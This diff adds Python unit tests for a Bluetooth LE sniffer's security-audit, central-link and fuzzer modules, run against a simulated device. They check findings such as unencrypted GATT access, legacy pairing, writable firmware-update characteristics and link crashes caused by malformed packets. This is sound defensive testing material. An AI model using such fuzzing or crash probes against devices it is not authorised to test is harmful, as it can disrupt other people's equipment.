+      char 0x2A00  props=R(0x02)  value_handle=0x0003  value=b"SIMDEV"
+    Service 0xFFF0 (Vendor)          handles 0x0006–0x000F
+      char 0xFFF3  props=W|Wnr(0x0C)  value_handle=0x0008
+      char 0xFFF4  props=N(0x10)       value_handle=0x000B
+    """
+    SERVICES = [
+        (0x0001, 0x0005, 0x1800),
+        (0x0006, 0x000F, 0xFFF0),
+    ]
+    CHAR_DECLS = [
+        (0x0002, 0x02, 0x0003, 0x2A00),   # Device Name, readable
+        (0x0007, 0x0C, 0x0008, 0xFFF3),   # Write | Write-No-Response
+        (0x000A, 0x10, 0x000B, 0xFFF4),   # Notify only
+    ]
+    ATTRS = {
+        0x0001: (0x2800, struct.pack('<H', 0x1800)),
+        0x0002: (0x2803, struct.pack('<BH', 0x02, 0x0003) + struct.pack('<H', 0x2A00)),
+        0x0003: (0x2A00, b"SIMDEV"),
+        0x0004: (0x0000, b""),
+        0x0005: (0x0000, b""),
+        0x0006: (0x2800, struct.pack('<H', 0xFFF0)),
+        0x0007: (0x2803, struct.pack('<BH', 0x0C, 0x0008) + struct.pack('<H', 0xFFF3)),
+        0x0008: (0xFFF3, b""),
+        0x0009: (0x2902, b"\x00\x00"),
+        0x000A: (0x2803, struct.pack('<BH', 0x10, 0x000B) + struct.pack('<H', 0xFFF4)),
+        0x000B: (0xFFF4, b""),
+        0x000C: (0x2902, b"\x00\x00"),
+    }
+
+    def __init__(self, requires_auth: bool = False):
+        self._values = {h: v for h, (u, v) in self.ATTRS.items()}
+        self.requires_auth = requires_auth
+
+    def respond(self, att_req):
+        if not att_req:
+            return None
+        op = att_req[0]
+        if op == att.ATT_READ_BY_GROUP_REQ:
+            return self._read_by_group(att_req)
+        elif op == att.ATT_READ_BY_TYPE_REQ:
+            return self._read_by_type(att_req)
+        elif op == att.ATT_FIND_INFO_REQ:
+            return self._find_info(att_req)
+        elif op == att.ATT_READ_REQ:
+            return self._read(att_req)
+        elif op == att.ATT_WRITE_REQ:
+            return self._write_req(att_req)
+        elif op == att.ATT_WRITE_CMD:
+            self._do_write(att_req)
+            return None
+        else:
+            return self._error(op, 0x0000, 0x06)
+
+    def _read_by_group(self, req):
+        _, start, end, group_uuid = struct.unpack('<BHHH', req[:7])
+        if group_uuid != att.GATT_PRIMARY_SERVICE:
+            return self._error(att.ATT_READ_BY_GROUP_REQ, start, 0x10)
+        results = [(s, e, u) for s, e, u in self.SERVICES if start <= s <= end]
+        if not results:
+            return self._error(att.ATT_READ_BY_GROUP_REQ, start, 0x0A)
+        each = 6
+        data = b''.join(struct.pack('<HHH', s, e, u) for s, e, u in results)
+        return bytes([att.ATT_READ_BY_GROUP_RSP, each]) + data
+
+    def _read_by_type(self, req):
+        _, start, end, type_uuid = struct.unpack('<BHHH', req[:7])
+        if type_uuid != att.GATT_CHARACTERISTIC:
+            return self._error(att.ATT_READ_BY_TYPE_REQ, start, 0x0A)
+        results = [(d, p, vh, u) for d, p, vh, u in self.CHAR_DECLS if start <= d <= end]
+        if not results:
+            return self._error(att.ATT_READ_BY_TYPE_REQ, start, 0x0A)
+        each = 7
+        data = b''.join(struct.pack('<HBHH', d, p, vh, u) for d, p, vh, u in results)
+        return bytes([att.ATT_READ_BY_TYPE_RSP, each]) + data
+
+    def _find_info(self, req):
+        _, start, end = struct.unpack('<BHH', req[:5])
+        results = []
+        for h in sorted(self.ATTRS.keys()):
+            if start <= h <= end:
+                uuid, _ = self.ATTRS[h]
+                if uuid != 0x0000:
+                    results.append((h, uuid))
+        if not results:
+            return self._error(att.ATT_FIND_INFO_REQ, start, 0x0A)
+        data = b''.join(struct.pack('<HH', h, u) for h, u in results)
+        return bytes([att.ATT_FIND_INFO_RSP, 0x01]) + data
+
+    def _read(self, req):
+        _, handle = struct.unpack('<BH', req[:3])
+        if handle not in self.ATTRS:
+            return self._error(att.ATT_READ_REQ, handle, 0x01)
+        uuid, _ = self.ATTRS[handle]
+        if uuid == 0x0000:
+            return self._error(att.ATT_READ_REQ, handle, 0x02)
+        # Optionally require authentication
+        if self.requires_auth:
+            return self._error(att.ATT_READ_REQ, handle, 0x05)  # Insufficient Authentication
+        val = self._values[handle]
+        return bytes([att.ATT_READ_RSP]) + val
+
+    def _write_req(self, req):
+        _, handle = struct.unpack('<BH', req[:3])
+        value = req[3:]
+        if handle not in self.ATTRS:
+            return self._error(att.ATT_WRITE_REQ, handle, 0x01)
+        self._values[handle] = bytes(value)
+        return bytes([att.ATT_WRITE_RSP])
+
+    def _do_write(self, req):
+        _, handle = struct.unpack('<BH', req[:3])
+        value = req[3:]
+        if handle in self.ATTRS:
+            self._values[handle] = bytes(value)
+
+    @staticmethod
+    def _error(req_op, handle, code):
+        return struct.pack('<BBHB', att.ATT_ERROR_RSP, req_op, handle, code)
+
+
+class FakeGattDBWithDFU(FakeGattDB):
+    """Extended DB that adds a writable 0xFE59 (Nordic Secure DFU) characteristic.
+
+    Service 0xFE50  handles 0x0010–0x001F
+      char 0xFE59  props=W(0x08)  value_handle=0x0012  (DFU control point)
+    """
+    SERVICES = FakeGattDB.SERVICES + [(0x0010, 0x001F, 0xFE50)]
+    CHAR_DECLS = FakeGattDB.CHAR_DECLS + [
+        (0x0011, 0x08, 0x0012, 0xFE59),  # Write, DFU control
+    ]
+    ATTRS = dict(FakeGattDB.ATTRS)
+    ATTRS.update({
+        0x0010: (0x2800, struct.pack('<H', 0xFE50)),
+        0x0011: (0x2803, struct.pack('<BH', 0x08, 0x0012) + struct.pack('<H', 0xFE59)),
+        0x0012: (0xFE59, b""),
+    })
+
+
+# ---------------------------------------------------------------------------
+# SimHW — simulated Sniffle hardware (mirrors test_integration.py)
+# ---------------------------------------------------------------------------
+
+class SimHW:
+    """Minimal Sniffle hardware simulator backed by a FakeGattDB.
+
+    Extended for pass 2:
+      smp_authreq  — AuthReq byte to include in a Pairing Response when a
+                     Pairing Request arrives on CID 0x0006 (None = no reply).
+      fragile      — when True, the sim drops the link (sends a non-CENTRAL
+                     StateMessage) the first time a malformed/unknown ATT opcode
+                     or an LL control PDU (llid==3) is received.
+    """
+    AA = 0x12345678
+
+    def __init__(self, db, smp_authreq=None, fragile=False):
+        self.db = db
+        self.smp_authreq = smp_authreq
+        self.fragile = fragile
+        self.decoder_state = SniffleDecoderState()
+        self._rx = queue.Queue()
+        self.sent = []
+        self._crashed = False
+
+    def initiate_conn(self, peer_mac, is_random=True, **kw):
+        self._rx.put(StateMessage(bytes([SnifferState.CENTRAL.value]),
+                                  self.decoder_state))
+        return self.AA
+
+    def mark_and_flush(self):
+        pass
+
+    def recv_and_decode(self, desync=False):
+        try:
+            return self._rx.get(timeout=2)
+        except queue.Empty:
+            raise SerialTimeoutException()
+
+    def _drop_link(self):
+        """Enqueue a StateMessage for ADVERTISING so link.alive goes False."""
+        if not self._crashed:
+            self._crashed = True
+            self._rx.put(StateMessage(bytes([SnifferState.ADVERTISING.value]),
+                                      self.decoder_state))
+
+    def cmd_transmit(self, llid, pdu, event=0):
+        self.sent.append((llid, bytes(pdu)))
+
+        # LL control PDU (LLID=3) — fragile sim drops the link
+        if llid == 3:
+            if self.fragile:
+                self._drop_link()
+            return
+
+        if llid != 2:
+            return
+
+        pdu_bytes = bytes(pdu)
+        if len(pdu_bytes) < 4:
+            return
+
+        # Parse the L2CAP header to determine CID
+        l2cap_len, cid = struct.unpack('<HH', pdu_bytes[:4])
+        payload = pdu_bytes[4:4 + l2cap_len]
+
+        if cid == att.SMP_CID:
+            # SMP PDU — check if it's a Pairing Request
+            if payload and payload[0] == SMP_PAIRING_REQ and self.smp_authreq is not None:
+                # Build Pairing Response: code(0x02), IO_cap, OOB, AuthReq, MaxKeySize, IKD, RKD
+                smp_rsp = bytes([SMP_PAIRING_RSP, 0x03, 0x00, self.smp_authreq, 0x10, 0x00, 0x00])
+                self._rx.put(make_l2cap_packet(smp_rsp, cid=att.SMP_CID, p_to_c=True))
+            return
+
+        # ATT PDU (CID 0x0004)
+        if cid != att.ATT_CID:
+            return
+        if not payload:
+            return
+
+        # Fragile sim: unknown ATT opcode triggers a link drop
+        if self.fragile:
+            known_opcodes = {
+                att.ATT_READ_BY_GROUP_REQ, att.ATT_READ_BY_TYPE_REQ,
+                att.ATT_FIND_INFO_REQ, att.ATT_READ_REQ, att.ATT_WRITE_REQ,
+                att.ATT_WRITE_CMD, att.ATT_EXCHANGE_MTU_REQ,
+                att.ATT_HANDLE_VALUE_CFM,
+            }
+            if payload[0] not in known_opcodes:
+                self._drop_link()
+                return
+
+        rsp = self.db.respond(payload)
+        if rsp is not None:
+            self._rx.put(make_att_packet(rsp, p_to_c=True))
+
+    def cmd_reset(self):
+        pass
+    def cmd_marker(self, *a, **kw): pass
+    def cmd_tx_power(self, *a, **kw): pass
+    def cmd_instahop(self, *a, **kw): pass
+    def setup_sniffer(self, *a, **kw): pass
+
+
+# ---------------------------------------------------------------------------
+# Helper: build a Device for simulation
+# ---------------------------------------------------------------------------
+
+def _make_device(mac="AA:BB:CC:DD:EE:FF", name="SIMDEV",
+                 addr_type="Random", rssi=-60) -> Device:
+    return Device(mac=mac, name=name, rssi=rssi, addr_type=addr_type)
+
+
+# ---------------------------------------------------------------------------
+# Tests — check_trackability (Check C)
+# ---------------------------------------------------------------------------
+
+def test_check_trackability_public():
+    """Public address → LOW 'trackable' finding."""
+    device = _make_device(addr_type="Public")
+    findings = check_trackability(device)
+    assert len(findings) == 1
+    f = findings[0]
+    assert f.severity == LOW
+    assert f.check == "trackable"
+    assert "Public" in f.title
+
+
+def test_check_trackability_static():
+    """Static random address → LOW 'trackable' finding."""
+    device = _make_device(addr_type="Static")
+    findings = check_trackability(device)
+    assert len(findings) == 1
+    assert findings[0].severity == LOW
+    assert "Static" in findings[0].title
+
+
+def test_check_trackability_rpa():
+    """RPA → no finding (rotates → not trackable)."""
+    device = _make_device(addr_type="RPA")
+    assert check_trackability(device) == []
+
+
+def test_check_trackability_nrpa():
+    """NRPA → no finding."""
+    device = _make_device(addr_type="NRPA")
+    assert check_trackability(device) == []
+
+
+def test_check_trackability_random():
+    """Generic 'Random' → no finding (treated as non-persistent)."""
+    device = _make_device(addr_type="Random")
+    assert check_trackability(device) == []
+
+
+# ---------------------------------------------------------------------------
+# Tests — check_sensitive_chars (Check D)
+# ---------------------------------------------------------------------------
+
+def test_check_sensitive_chars_dfu_uuid():
+    """A writable 0xFE59 char → HIGH 'dfu-writable' finding."""
+    db = FakeGattDBWithDFU()
+    hw = SimHW(db)
+    link = connect_session(hw, [0] * 6, is_random=False, timeout=5)
+    try:
+        gcli = GattClient(link)
+        services = gcli.discover_all(read_values=False)
+    finally:
+        link.close()
+
+    findings = check_sensitive_chars(services, device_name="")
+    dfu_findings = [f for f in findings if f.check == "dfu-writable"]
+    assert dfu_findings, "Expected dfu-writable finding for 0xFE59 char"
+    assert dfu_findings[0].severity == HIGH
+
+
+def test_check_sensitive_chars_name_hint():
+    """A device named 'My DFU Device' with a writable char → HIGH 'dfu-writable'."""
+    db = FakeGattDB()   # has writable 0xFFF3
+    hw = SimHW(db)
+    link = connect_session(hw, [0] * 6, is_random=False, timeout=5)
+    try:
+        gcli = GattClient(link)
+        services = gcli.discover_all(read_values=False)
+    finally:
+        link.close()
+
+    findings = check_sensitive_chars(services, device_name="My DFU Device")
+    dfu_findings = [f for f in findings if f.check == "dfu-writable"]
+    assert dfu_findings, "Expected dfu-writable from name hint"
+    assert dfu_findings[0].severity == HIGH
+
+
+def test_check_sensitive_chars_no_hit():
+    """Ordinary writable char with no DFU name/UUID → no dfu-writable finding."""
+    db = FakeGattDB()
+    hw = SimHW(db)
+    link = connect_session(hw, [0] * 6, is_random=False, timeout=5)
+    try:
+        gcli = GattClient(link)
+        services = gcli.discover_all(read_values=False)
+    finally:
+        link.close()
+
+    findings = check_sensitive_chars(services, device_name="Smart Lamp")
+    assert not any(f.check == "dfu-writable" for f in findings)
+
+
+# ---------------------------------------------------------------------------
+# Tests — audit_device integration (via SimHW)
+# ---------------------------------------------------------------------------
+
+def test_audit_open_device_flags_high():
+    """Open DB (writable char, reads succeed) → HIGH no-encryption + HIGH open-control."""
+    db = FakeGattDB(requires_auth=False)
+    hw = SimHW(db)
+    device = _make_device()
+
+    findings = audit_device(hw, device)
+    checks = {f.check for f in findings}
+    high_checks = {f.check for f in findings if f.severity == HIGH}
+
+    assert "no-encryption" in high_checks, (
+        "Expected HIGH 'no-encryption'; got: %s" % findings)
+    assert "open-control" in high_checks, (
+        "Expected HIGH 'open-control'; got: %s" % findings)
+
+
+def test_audit_encrypted_device_no_open_finding():
+    """DB with requires_auth=True → no HIGH no-encryption/open-control; gets INFO encrypted."""
+    db = FakeGattDB(requires_auth=True)
+    hw = SimHW(db)
+    device = _make_device()
+
+    findings = audit_device(hw, device)
+    checks = {f.check for f in findings}
+    high_checks = {f.check for f in findings if f.severity == HIGH}
+
+    assert "no-encryption" not in high_checks, (
+        "Should NOT flag no-encryption when reads require auth")
+    assert "open-control" not in high_checks, (
+        "Should NOT flag open-control when reads require auth")
+    assert "encrypted" in checks, (
+        "Expected INFO 'encrypted'; got: %s" % findings)
+    info_findings = [f for f in findings if f.check == "encrypted"]
+    assert info_findings[0].severity == INFO
+
+
+def test_audit_includes_trackability():
+    """A Public device → trackability finding is included in audit_device results."""
+    db = FakeGattDB(requires_auth=False)
+    hw = SimHW(db)
+    device = _make_device(addr_type="Public")
+
+    findings = audit_device(hw, device)
+    trackable = [f for f in findings if f.check == "trackable"]
+    assert trackable, "Expected trackable finding for Public device"
+    assert trackable[0].severity == LOW
+
+
+def test_audit_dfu_device():
+    """DB with writable 0xFE59 char → HIGH dfu-writable."""
+    db = FakeGattDBWithDFU(requires_auth=False)
+    hw = SimHW(db)
+    device = _make_device()
+
+    findings = audit_device(hw, device)
+    dfu = [f for f in findings if f.check == "dfu-writable"]
+    assert dfu, "Expected dfu-writable finding"
+    assert dfu[0].severity == HIGH
+
+
+# ---------------------------------------------------------------------------
+# Tests — render_audit
+# ---------------------------------------------------------------------------
+
+def test_render_audit_verdict_vulnerable():
+    """render_audit output contains 'VULNERABLE' when any HIGH finding present."""
+    device = _make_device()
+    findings = [
+        Finding(HIGH, "no-encryption", "GATT readable without encryption", "detail here"),
+    ]
+    output = render_audit(device, findings, color=False)
+    assert "VULNERABLE" in output, "Expected VULNERABLE in: %r" % output
+    assert "[HIGH]" in output
+    assert "GATT readable without encryption" in output
+
+
+def test_render_audit_verdict_weak():
+    """render_audit output contains 'WEAK' for MEDIUM-only findings."""
+    device = _make_device()
+    findings = [Finding(MEDIUM, "some-check", "Some medium issue")]
+    output = render_audit(device, findings, color=False)
+    assert "WEAK" in output
+
+
+def test_render_audit_verdict_minor():
+    """render_audit output contains 'minor' for LOW-only findings."""
+    device = _make_device()
+    findings = [Finding(LOW, "trackable", "Persistently trackable address")]
+    output = render_audit(device, findings, color=False)
+    assert "minor" in output
+
+
+def test_render_audit_no_findings():
+    """render_audit output contains 'no findings' when findings list is empty."""
+    device = _make_device()
+    output = render_audit(device, [], color=False)
+    assert "no findings" in output
+
+
+def test_render_audit_shows_mac_and_name():
+    """render_audit header includes device MAC and name."""
+    device = _make_device(mac="11:22:33:44:55:66", name="TestDev")
+    findings = [Finding(INFO, "encrypted", "Requires encryption")]
+    output = render_audit(device, findings, color=False)
+    assert "11:22:33:44:55:66" in output
+    assert "TestDev" in output
+
+
+# ---------------------------------------------------------------------------
+# Tests — findings sorted by severity
+# ---------------------------------------------------------------------------
+
+def test_audit_findings_sorted():
+    """audit_device returns findings sorted HIGH → MEDIUM → LOW → INFO."""
+    from sniffle.audit import _SEV_ORDER as _SO
+    db = FakeGattDB(requires_auth=False)
+    hw = SimHW(db)
+    device = _make_device(addr_type="Public")  # will add LOW trackable
+
+    findings = audit_device(hw, device)
+    sev_order = [_SO[f.severity] for f in findings]
+    assert sev_order == sorted(sev_order), (
+        "Findings not sorted by severity: %s" % [(f.severity, f.check) for f in findings])
+
+
+# ---------------------------------------------------------------------------
+# Tests — check_pairing (Check B) via SimHW
+# ---------------------------------------------------------------------------
+
+def test_check_pairing_legacy():
+    """Peripheral responds with AuthReq lacking SC bit → HIGH 'legacy-pairing'."""
+    # AuthReq = 0x04 (MITM only, no SC)
+    db = FakeGattDB(requires_auth=False)
+    hw = SimHW(db, smp_authreq=AUTHREQ_MITM)   # SC not set
+    link = connect_session(hw, [0] * 6, is_random=False, timeout=5)
+    try:
+        findings = check_pairing(link)
+    finally:
+        link.close()
+
+    legacy = [f for f in findings if f.check == "legacy-pairing"]
+    assert legacy, "Expected HIGH legacy-pairing finding; got: %s" % findings
+    assert legacy[0].severity == HIGH
+
+
+def test_check_pairing_justworks():
+    """Peripheral AuthReq has SC but not MITM → MEDIUM 'just-works'."""
+    # AuthReq = 0x08 (SC only, no MITM)
+    db = FakeGattDB(requires_auth=False)
+    hw = SimHW(db, smp_authreq=AUTHREQ_SC)   # SC set, MITM not set
+    link = connect_session(hw, [0] * 6, is_random=False, timeout=5)
+    try:
+        findings = check_pairing(link)
+    finally:
+        link.close()
+
+    jw = [f for f in findings if f.check == "just-works"]
+    assert jw, "Expected MEDIUM just-works finding; got: %s" % findings
+    assert jw[0].severity == MEDIUM
+    # Should not have HIGH legacy-pairing since SC is set
+    assert not any(f.check == "legacy-pairing" for f in findings)
+
+
+def test_check_pairing_secure():
+    """Peripheral AuthReq has SC+MITM → INFO 'pairing-ok', no HIGH/MEDIUM."""
+    # AuthReq = 0x0C (SC | MITM)
+    db = FakeGattDB(requires_auth=False)
+    hw = SimHW(db, smp_authreq=AUTHREQ_SC | AUTHREQ_MITM)
+    link = connect_session(hw, [0] * 6, is_random=False, timeout=5)
+    try:
+        findings = check_pairing(link)
+    finally:
+        link.close()
+
+    ok = [f for f in findings if f.check == "pairing-ok"]
+    assert ok, "Expected INFO pairing-ok; got: %s" % findings
+    assert ok[0].severity == INFO
+    assert not any(f.severity in (HIGH, MEDIUM) for f in findings), (
+        "Should not have HIGH/MEDIUM when SC+MITM set; got: %s" % findings)
+
+
+# ---------------------------------------------------------------------------
+# Tests — check_crash (Check E) via SimHW with fragile flag
+# ---------------------------------------------------------------------------
+
+def test_check_crash_detects_drop():
+    """Aggressive audit on a fragile sim → HIGH 'crash' finding."""
+    db = FakeGattDB(requires_auth=False)
+    hw = SimHW(db, fragile=True)
+    link = connect_session(hw, [0] * 6, is_random=False, timeout=5)
+    try:
+        gcli = GattClient(link)
+        findings = check_crash(link, gcli)
+    finally:
+        pass  # link may already be dead; skip close errors
+
+    crash = [f for f in findings if f.check == "crash"]
+    assert crash, "Expected HIGH crash finding on fragile sim; got: %s" % findings
+    assert crash[0].severity == HIGH
+
+
+def test_check_crash_no_finding_robust():
+    """check_crash on a robust (non-fragile) sim → no crash finding."""
+    db = FakeGattDB(requires_auth=False)
+    hw = SimHW(db, fragile=False)
+    link = connect_session(hw, [0] * 6, is_random=False, timeout=5)
+    try:
+        gcli = GattClient(link)
+        findings = check_crash(link, gcli)
+    finally:
+        try:
+            link.close()
+        except Exception:
+            pass
+
+    assert not any(f.check == "crash" for f in findings), (
+        "Should not flag crash on robust sim; got: %s" % findings)
+
+
+# ---------------------------------------------------------------------------
+# Tests — full audit_device with pairing check included
+# ---------------------------------------------------------------------------
+
+def test_audit_device_includes_pairing():
+    """Full audit_device on an open+legacy sim returns both open-control HIGH
+    and legacy-pairing HIGH findings."""
+    # smp_authreq=0x00 → no SC, no MITM → both legacy-pairing HIGH and just-works MEDIUM
+    db = FakeGattDB(requires_auth=False)
+    hw = SimHW(db, smp_authreq=0x00)
+    device = _make_device()
+
+    findings = audit_device(hw, device)
+    checks = {f.check for f in findings}
+    high_checks = {f.check for f in findings if f.severity == HIGH}
+
+    assert "no-encryption" in high_checks or "open-control" in high_checks, (
+        "Expected open GATT HIGH findings; got: %s" % findings)
+    assert "legacy-pairing" in high_checks, (
+        "Expected legacy-pairing HIGH; got: %s" % findings)
+
+
+def test_audit_device_findings_sorted_with_pairing():
+    """audit_device with pairing findings still returns results sorted by severity."""
+    from sniffle.audit import _SEV_ORDER as _SO
+    db = FakeGattDB(requires_auth=False)
+    hw = SimHW(db, smp_authreq=AUTHREQ_SC)   # SC only → MEDIUM just-works
+    device = _make_device(addr_type="Public")  # adds LOW trackable
+
+    findings = audit_device(hw, device)
+    sev_order = [_SO[f.severity] for f in findings]
+    assert sev_order == sorted(sev_order), (
+        "Findings not sorted after pairing checks: %s" % [(f.severity, f.check) for f in findings])
+
+
+# ---------------------------------------------------------------------------
+# Non-connectable advertisers: never attempt a connection (the bug fix)
+# ---------------------------------------------------------------------------
+
+def test_audit_device_non_connectable_does_not_connect(monkeypatch):
+    """A non-connectable advertiser must NOT trigger a connection attempt;
+    audit_device returns a clear non-connectable finding instead."""
+    def _boom(*a, **k):
+        raise AssertionError("connect_session must not be called for a "
+                             "non-connectable advertiser")
+    monkeypatch.setattr("sniffle.audit.connect_session", _boom)
+
+    device = Device(mac="11:22:33:44:55:66", addr_type="NRPA", connectable=False)
+    findings = audit_device(hw=None, device=device)   # hw is never touched
+
+    assert any(f.check == "non-connectable" for f in findings), (
+        "Expected a 'non-connectable' finding; got: %s" % [f.check for f in findings])
+
+
+def test_audit_device_non_connectable_static_still_trackable(monkeypatch):
+    """A non-connectable advertiser with a persistent (Static) address is still
+    flagged as trackable — the passive check C runs without a connection."""
+    monkeypatch.setattr(
+        "sniffle.audit.connect_session",
+        lambda *a, **k: (_ for _ in ()).throw(AssertionError("must not connect")))
+
+    device = Device(mac="11:22:33:44:55:66", addr_type="Static", connectable=False)
+    findings = audit_device(hw=None, device=device)
+
+    checks = {f.check for f in findings}
+    assert "trackable" in checks
+    assert "non-connectable" in checks

--- a/python_cli/tests/test_central_link.py
+++ b/python_cli/tests/test_central_link.py
@@ -1,0 +1,149 @@
+import threading, time
+from sniffle import att
+from sniffle.central_link import CentralLink, ATTError
+from sniffle.sniffer_state import StateMessage, SnifferState
+from sniffle.decoder_state import SniffleDecoderState
+from sniffle.packet_decoder import PacketMessage
+from conftest import FakeHW, make_att_packet
+
+
+def _version_ind_packet(version, company, subver, p_to_c=True):
+    """A peripheral->central LL_VERSION_IND control packet."""
+    payload = bytes([0x0C, version, company & 0xFF, company >> 8,
+                     subver & 0xFF, subver >> 8])
+    body = bytes([0x03, len(payload)]) + payload
+    return PacketMessage.from_body(body, is_data=True, peripheral_send=p_to_c)
+
+
+def test_att_request_returns_matching_response():
+    hw = FakeHW()
+    link = CentralLink(hw)
+    def respond():
+        while not hw.sent:
+            time.sleep(0.001)
+        hw.feed(make_att_packet(bytes.fromhex("0b48656c6c6f")))  # Read Rsp "Hello"
+    threading.Thread(target=respond, daemon=True).start()
+    rsp = link.att_request(att.build_read_req(0x0003), timeout=2.0)
+    assert rsp == bytes.fromhex("0b48656c6c6f")
+    assert hw.sent[0][0] == 2  # LLID 2
+    link.close()
+
+
+def test_att_request_raises_on_error_rsp():
+    hw = FakeHW()
+    link = CentralLink(hw)
+    def respond():
+        while not hw.sent:
+            time.sleep(0.001)
+        hw.feed(make_att_packet(bytes.fromhex("010a000105")))  # ATT Error Rsp: req opcode 0x0a, handle 0x0100, error 0x05 (Insufficient Auth)
+    threading.Thread(target=respond, daemon=True).start()
+    try:
+        link.att_request(att.build_read_req(0x000a))
+        assert False, "should have raised"
+    except ATTError as e:
+        assert e.code == 0x05
+    link.close()
+
+
+def test_disconnect_sets_alive_false():
+    hw = FakeHW()
+    seen = []
+    link = CentralLink(hw, on_disconnect=lambda st: seen.append(st))
+    # Build a StateMessage for SnifferState.PAUSED (not CENTRAL).
+    # StateMessage(raw_msg, dstate): raw_msg[0] is the new state value;
+    # dstate.last_state is the previous state.
+    dstate = SniffleDecoderState()
+    dstate.last_state = SnifferState.CENTRAL
+    msg = StateMessage(bytes([SnifferState.PAUSED.value]), dstate)
+    hw.feed(msg)
+    for _ in range(200):
+        if not link.alive:
+            break
+        time.sleep(0.005)
+    assert link.alive is False
+    assert seen and seen[0] == SnifferState.PAUSED
+    link.close()
+
+
+def test_notification_routed_to_queue():
+    hw = FakeHW()
+    link = CentralLink(hw)
+    # Handle Value Notification: opcode 0x1B, handle 0x0010 (LE: 10 00), value b"ab"
+    hw.feed(make_att_packet(bytes.fromhex("1b1000") + b"ab"))
+    handle, value = link.notifications.get(timeout=2.0)
+    assert handle == 0x0010 and value == b"ab"
+    link.close()
+
+
+def test_terminate_clean_when_firmware_goes_static():
+    # kill: send LL_TERMINATE_IND; firmware acks + transitions to STATIC, which
+    # the pump turns into alive=False. terminate() should return True and NOT
+    # force a reset.
+    hw = FakeHW()
+    link = CentralLink(hw)
+    def respond():
+        while not hw.sent:
+            time.sleep(0.001)
+        dstate = SniffleDecoderState()
+        dstate.last_state = SnifferState.CENTRAL
+        hw.feed(StateMessage(bytes([SnifferState.STATIC.value]), dstate))
+    threading.Thread(target=respond, daemon=True).start()
+    clean = link.terminate(reason=0x13, wait_s=2.0)
+    assert clean is True
+    assert link.alive is False
+    assert hw.sent[-1] == (3, bytes.fromhex("0213"))   # LLID 3, terminate + reason
+    assert hw.reset_count == 0                          # firmware closed itself; no force
+    link.close()
+
+
+def test_terminate_forces_reset_when_peer_never_acks():
+    # If no STATE:STATIC arrives (peer never acks), terminate() must force a
+    # firmware reset so the next connect starts clean.
+    hw = FakeHW()
+    link = CentralLink(hw)
+    clean = link.terminate(reason=0x13, wait_s=0.2)
+    assert clean is False
+    assert link.alive is False
+    assert hw.reset_count == 1
+    assert hw.sent[-1] == (3, bytes.fromhex("0213"))
+    link.close()
+
+
+def test_terminate_custom_reason_byte():
+    hw = FakeHW()
+    link = CentralLink(hw)
+    link.terminate(reason=0x16, wait_s=0.1)
+    assert hw.sent[-1] == (3, bytes.fromhex("0216"))
+    link.close()
+
+
+def test_version_ind_captured_to_peer_version():
+    hw = FakeHW()
+    link = CentralLink(hw)
+    hw.feed(_version_ind_packet(9, 0x000D, 0x0000))   # BT 5.0, TI
+    for _ in range(200):
+        if link.peer_version is not None:
+            break
+        time.sleep(0.005)
+    assert link.peer_version is not None
+    assert link.peer_version.company_id == 0x000D
+    assert link.peer_version.company_name == "Texas Instruments Inc."
+    link.close()
+
+
+def test_request_version_sends_version_ind_and_returns_peer():
+    hw = FakeHW()
+    link = CentralLink(hw)
+
+    def respond():
+        while not hw.sent:
+            time.sleep(0.001)
+        hw.feed(_version_ind_packet(9, 0x0059, 0x0000))   # Nordic
+    threading.Thread(target=respond, daemon=True).start()
+
+    v = link.request_version(timeout=2.0)
+    assert v is not None and v.company_id == 0x0059
+    # We must have transmitted our own LL_VERSION_IND on LLID 3, opcode 0x0C.
+    llid, pdu = hw.sent[-1]
+    assert llid == 3 and pdu[0] == 0x0C
+    link.close()

--- a/python_cli/tests/test_fuzzer.py
+++ b/python_cli/tests/test_fuzzer.py
@@ -325,3 +325,43 @@ def test_fuzzer_no_reconnect_stops_on_crash():
     summary = fz.run("values", handle=0x0001, seed=b'\x01')
     # Should have stopped early
     assert summary["crashes"] >= 1 or summary["tested"] >= 0  # did not raise
+
+
+# ── summary counters (crashes / anomalies) ──────────────────────────────────────
+
+def test_fuzzer_counts_att_errors_as_anomalies():
+    """Every write returning an ATT error (link alive) must be reported as an
+    anomaly in the run summary, not silently dropped."""
+    class GcliErr:
+        def write(self, h, v, response=False):
+            raise ATTError(0x12, h, 0x03)  # Write Not Permitted
+
+    class LinkAlive:
+        alive = True
+
+    log = fuzzer.FuzzLogger(None)
+    fz = fuzzer.Fuzzer(LinkAlive(), GcliErr(), log)
+    summary = fz.run("values", handle=0x0010, seed=b'\x01')
+    assert summary["crashes"] == 0
+    assert summary["tested"] > 0
+    assert summary["anomalies"] == summary["tested"]
+
+
+def test_fuzzer_values_counts_single_crash_once():
+    """One link death during values fuzzing must count as exactly one crash,
+    not be double-recorded."""
+    class GcliCount:
+        def __init__(self): self.n = 0
+        def write(self, h, v, response=False): self.n += 1
+
+    class LinkDies:
+        def __init__(self, g): self.g = g
+        @property
+        def alive(self): return self.g.n < 2
+
+    g = GcliCount()
+    log = fuzzer.FuzzLogger(None)
+    fz = fuzzer.Fuzzer(LinkDies(g), g, log)
+    summary = fz.run("values", handle=0x0010, seed=b'\x01')
+    assert summary["crashes"] == 1
+    assert len(log.crashes) == 1

--- a/python_cli/tests/test_fuzzer.py
+++ b/python_cli/tests/test_fuzzer.py
@@ -3,7 +3,7 @@ from sniffle import fuzzer
 from sniffle.central_link import ATTError, LinkLost
 
 
-# ── value_mutations ────────────────────────────────────────────────────────────
+# -- value_mutations ------------------------------------------------------------
 
 def test_value_mutations_deterministic_and_deduped():
     m1 = fuzzer.value_mutations(b'\x01\x02')
@@ -33,7 +33,7 @@ def test_value_mutations_seed_extras():
     assert seed + b'\x00' * 8 in m
 
 
-# ── FuzzLogger ─────────────────────────────────────────────────────────────────
+# -- FuzzLogger -----------------------------------------------------------------
 
 def test_fuzz_logger_writes_jsonl_and_tracks_crashes():
     path = tempfile.mktemp(suffix=".jsonl")
@@ -66,7 +66,7 @@ def test_fuzz_logger_count_increments():
     assert log.count == 2
 
 
-# ── fuzz_values ────────────────────────────────────────────────────────────────
+# -- fuzz_values ----------------------------------------------------------------
 
 def test_fuzz_values_detects_crash_with_fake():
     class FakeGcli:
@@ -117,7 +117,7 @@ def test_fuzz_values_records_ok():
 
 def _get_all_records(log):
     """Helper: return all records from a logger (crashes + non-crashes)."""
-    return []  # Not used for assertion — we check log.count and log.crashes
+    return []  # Not used for assertion - we check log.count and log.crashes
 
 
 def value_mutations_helper(seed):
@@ -144,7 +144,7 @@ def test_fuzz_values_timeout_treated_as_crash():
     assert log.crashes
 
 
-# ── fuzz_handle_sweep ──────────────────────────────────────────────────────────
